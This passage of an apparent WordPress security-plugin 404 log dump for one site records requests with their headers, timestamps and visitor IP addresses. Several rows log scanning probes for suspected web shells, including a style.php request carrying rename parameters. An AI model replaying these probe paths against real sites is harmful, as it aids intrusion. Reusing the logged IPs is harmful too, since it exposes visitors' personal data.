21:01:54',72604768,72688536,'http://zphiblgz.org/sr_db.php',1,0,'23.154.177.2'),(97043,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:148:\"Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631566900.08343791961669921875;s:12:\"REQUEST_TIME\";i:1631566900;}}','notice','2021-09-13 21:01:42','2021-09-13 21:01:40',72606200,72690040,'http://zphiblgz.org/searchbd/',1,0,'23.154.177.2'),(97042,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:148:\"Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631566853.943873882293701171875;s:12:\"REQUEST_TIME\";i:1631566853;}}','notice','2021-09-13 21:00:55','2021-09-13 21:00:54',72606120,72689968,'http://zphiblgz.org/s-r/',1,0,'185.31.175.215'),(97041,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:10:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:148:\"Mozilla/5.0 (iPod; U; CPU iPhone OS 4_2_1 like Mac OS X; en-gb) AppleWebKit/533.17.9 (KHTML, like Gecko) Version/5.0.2 Mobile/8C148 Safari/6533.18.5\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631566843.6078441143035888671875;s:12:\"REQUEST_TIME\";i:1631566843;}}','notice','2021-09-13 21:00:45','2021-09-13 21:00:43',72604680,72688424,'http://zphiblgz.org/S-R/',1,0,'45.153.160.132'),(97040,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4093.3 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631560054.721157073974609375;s:12:\"REQUEST_TIME\";i:1631560054;}}','notice','2021-09-13 19:07:37','2021-09-13 19:07:34',72716672,72800408,'http://zphiblgz.org/scholarship/application/',1,0,'195.246.120.144'),(97039,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631555774.7782061100006103515625;s:12:\"REQUEST_TIME\";i:1631555774;}}','notice','2021-09-13 17:56:16','2021-09-13 17:56:15',72605448,72689184,'http://zphiblgz.org/scholarship/application/',1,0,'176.31.115.13'),(97038,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.49\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631553330.1051731109619140625;s:12:\"REQUEST_TIME\";i:1631553330;}}','notice','2021-09-13 17:15:33','2021-09-13 17:15:30',72725136,72810256,'http://zphiblgz.org/scholarship/application/',1,0,'46.148.234.229'),(97037,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:101:\"Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631539881.0046679973602294921875;s:12:\"REQUEST_TIME\";i:1631539881;}}','notice','2021-09-13 13:31:22','2021-09-13 13:31:21',72612680,72695664,'https://zphiblgz.org/scholarship/application/',1,0,'104.244.76.170'),(97036,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:7:\"deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:35:\"ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631538143.4702780246734619140625;s:12:\"REQUEST_TIME\";i:1631538143;}}','notice','2021-09-13 13:02:25','2021-09-13 13:02:23',72631568,72713912,'https://zphiblgz.org/scholarship/application/',1,0,'80.253.235.74'),(97035,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:17:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631526689.2858369350433349609375;s:12:\"REQUEST_TIME\";i:1631526689;}}','notice','2021-09-13 09:51:31','2021-09-13 09:51:29',72613008,72695376,'https://zphiblgz.org/license.php',1,0,'185.191.34.215'),(97034,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:1:\"*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"de,en-US;q=0.7,en;q=0.3\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:132:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 OPR/72.0.3815.400\";s:16:\"HTTP_X_CLIENT_IP\";s:12:\"78.46.90.120\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631521881.8801019191741943359375;s:12:\"REQUEST_TIME\";i:1631521881;}}','notice','2021-09-13 08:31:24','2021-09-13 08:31:22',72635472,72718776,'https://zphiblgz.org/ts_teams/tracy-irvin/',1,0,'78.46.90.120'),(97033,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"27\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631514699.5230391025543212890625;s:12:\"REQUEST_TIME\";i:1631514699;}}','notice','2021-09-13 06:31:41','2021-09-13 06:31:39',72652640,72737264,'https://zphiblgz.org/webconfig.txt.php',1,0,'185.191.34.215'),(97032,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:11:\"HTTP_ACCEPT\";s:47:\"text/html,application/xhtml+xml,application/xml\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:68:\"Buck/2.2; (+https://app.hypefactors.com/media-monitoring/about.html)\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631509126.8547680377960205078125;s:12:\"REQUEST_TIME\";i:1631509126;}}','notice','2021-09-13 04:58:48','2021-09-13 04:58:47',72604872,72688640,'http://zphiblgz.org/application',1,0,'3.82.213.255'),(97031,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:16:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631508410.915152072906494140625;s:12:\"REQUEST_TIME\";i:1631508410;}}','notice','2021-09-13 04:46:53','2021-09-13 04:46:51',72168936,72252240,'https://zphiblgz.org/ts_teams/maya-franklin/',1,0,'207.46.13.142'),(97030,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631505920.158216953277587890625;s:12:\"REQUEST_TIME\";i:1631505920;}}','notice','2021-09-13 04:05:22','2021-09-13 04:05:20',72623072,72706808,'http://zphiblgz.org/scholarship/application/',1,0,'1.169.119.10'),(97029,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:19:{s:14:\"CONTENT_LENGTH\";s:2:\"31\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631500511.82133388519287109375;s:12:\"REQUEST_TIME\";i:1631500511;}}','notice','2021-09-13 02:35:13','2021-09-13 02:35:12',72627904,72712544,'https://zphiblgz.org/lieats.php',1,0,'185.191.34.215'),(97028,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:45:\"https://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.72 Safari/537.36 Edg/90.0.818.42\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631498296.255466938018798828125;s:12:\"REQUEST_TIME\";i:1631498296;}}','notice','2021-09-13 01:58:18','2021-09-13 01:58:16',72612712,72695696,'https://zphiblgz.org/scholarship/application/',1,0,'185.220.101.146'),(97027,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:12:{s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:44:\"http://zphiblgz.org/scholarship/application/\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631497940.583570003509521484375;s:12:\"REQUEST_TIME\";i:1631497940;}}','notice','2021-09-13 01:52:22','2021-09-13 01:52:20',72604936,72688672,'http://zphiblgz.org/scholarship/application/',1,0,'195.154.60.148'),(97026,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:14:{s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:16:\"en-US, tr; q=0.5\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:78:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631497121.8303830623626708984375;s:12:\"REQUEST_TIME\";i:1631497121;}}','notice','2021-09-13 01:38:43','2021-09-13 01:38:42',72655424,72738232,'https://zphiblgz.org/style.php?sig=rename&source_name=boktandosyaadi1&rename=boktandosyaadi2',1,0,'45.158.15.145'),(97025,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:23:{s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:124:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:17:\"gzip, deflate, br\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:12:\"HTTP_REFERER\";s:27:\"https://zphiblgz.org/youth/\";s:14:\"HTTP_SEC_CH_UA\";s:77:\"\\\"Microsoft Edge\\\";v=\\\"93\\\", \\\" Not;A Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"93\\\"\";s:21:\"HTTP_SEC_CH_UA_MOBILE\";s:2:\"?0\";s:23:\"HTTP_SEC_CH_UA_PLATFORM\";s:11:\"\\\"Windows\\\"\";s:19:\"HTTP_SEC_FETCH_DEST\";s:8:\"document\";s:19:\"HTTP_SEC_FETCH_MODE\";s:8:\"navigate\";s:19:\"HTTP_SEC_FETCH_SITE\";s:11:\"same-origin\";s:19:\"HTTP_SEC_FETCH_USER\";s:2:\"?1\";s:30:\"HTTP_UPGRADE_INSECURE_REQUESTS\";s:1:\"1\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36 Edg/93.0.961.47\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:18:\"REQUEST_TIME_FLOAT\";d:1631496071.1105239391326904296875;s:12:\"REQUEST_TIME\";i:1631496071;}}','notice','2021-09-13 01:21:13','2021-09-13 01:21:11',72638632,72725360,'https://zphiblgz.org/event/youth-open-house/',1,0,'24.162.155.202'),(97148,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:15:{s:14:\"CONTENT_LENGTH\";s:2:\"41\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:16:\"www.zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821111.73931598663330078125;s:12:\"REQUEST_TIME\";i:1631821111;}}','notice','2021-09-16 19:38:33','2021-09-16 19:38:31',72683568,72785136,'http://www.zphiblgz.org/api/user/mobilelogin',1,0,'101.36.110.241'),(97149,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:37:\"/home2/zphiblgz/public_html/index.php\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:18:\"REQUEST_TIME_FLOAT\";d:1631821115.192718982696533203125;s:12:\"REQUEST_TIME\";i:1631821115;}}','notice','2021-09-16 19:38:36','2021-09-16 19:38:35',72350208,72450392,'http://zphiblgz.org/cscpLoginWeb/app/home',1,0,'101.36.110.241'),(97150,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:13:{s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:18:\"HTTP_AUTHORIZATION\";s:0:\"\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:12:\"zphiblgz.org\";s:15:\"HTTP_USER_AGENT\";s:121:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 